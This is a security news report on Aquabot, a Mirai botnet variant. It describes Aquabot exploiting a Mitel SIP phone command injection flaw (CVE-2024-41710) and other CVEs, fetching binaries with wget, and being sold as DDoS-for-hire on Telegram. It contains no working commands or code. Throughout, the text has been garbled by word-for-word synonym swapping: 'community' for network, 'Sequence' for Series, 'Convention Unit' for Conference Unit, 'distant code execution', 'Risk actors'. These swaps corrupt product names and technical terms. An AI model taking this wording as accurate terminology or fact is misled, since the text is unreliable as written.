A Mirai botnet variant dubbed Aquabot has been noticed actively making an attempt to take advantage of a medium-severity security flaw impacting Mitel telephones so as to ensnare them right into a community able to mounting distributed denial-of-service (DDoS) assaults.
The vulnerability in query is CVE-2024-41710 (CVSS rating: 6.8), a case of command injection within the boot course of that would enable a malicious actor to execute arbitrary instructions inside the context of the telephone.
It impacts Mitel 6800 Sequence, 6900 Sequence, 6900w Sequence SIP Telephones, and Mitel 6970 Convention Unit. It was addressed by Mitel in mid-July 2024. A proof-of-concept (PoC) exploit for the flaw grew to become publicly out there in August.
Outdoors of CVE-2024-41710, among the different vulnerabilities focused by the botnet embrace CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a distant code execution flaw concentrating on Linksys E-series units.
“Aquabot is a botnet that was constructed off the Mirai framework with the last word aim of distributed denial-of-service (DDoS),” Akamai researchers Kyle Lefton and Larry Cashdollar mentioned. “It has been identified since November 2023.”
The online infrastructure firm mentioned it detected lively exploitation makes an attempt in opposition to CVE-2024-41710 since early January 2025, with the assaults mirroring a “payload nearly similar to the PoC” to deploy the botnet malware.
The assault entails executing a shell script that, in flip, makes use of the “wget” command to retrieve Aquabot for various CPU architectures.
The Aquabot Mirai variant noticed within the assault has been assessed to be a 3rd iteration of the malware, sporting a novel “report_kill” operate that experiences again to the command-and-control (C2) server when a kill sign is caught on the contaminated machine. Nonetheless, sending this info hasn’t been discovered to elicit any response from the server up to now.
This new model, apart from triggering C2 communication upon detecting sure indicators, renames itself to “httpd.x86” to keep away from attracting consideration and is programmed to terminate processes that match sure necessities, comparable to native shells. It is suspected that the sign dealing with options are probably integrated to craft extra stealthy variants or detect malicious exercise from competing botnets.
There may be some proof suggesting that the menace actors behind Aquabot are providing the community of compromised hosts as a DDoS service on Telegram beneath the monikers Cursinq Firewall, The Eye Companies, and The Eye Botnet.
The event is an indication that Mirai continues to plague a variety of internet-connected units that usually lack correct security options, or have both reached end-of-life or left accessible with default configuration and passwords, making them low-hanging fruits ripe for exploitation and a key conduit for DDoS assaults.
“Risk actors generally declare that the botnet is used just for DDoS mitigation testing functions to attempt to mislead researchers or regulation enforcement,” the researchers mentioned.
“Risk actors will declare it is only a PoC or one thing academic, however a deeper evaluation exhibits that they’re the truth is promoting DDoS as a service, or the house owners are boasting about working their very own botnet on Telegram.”
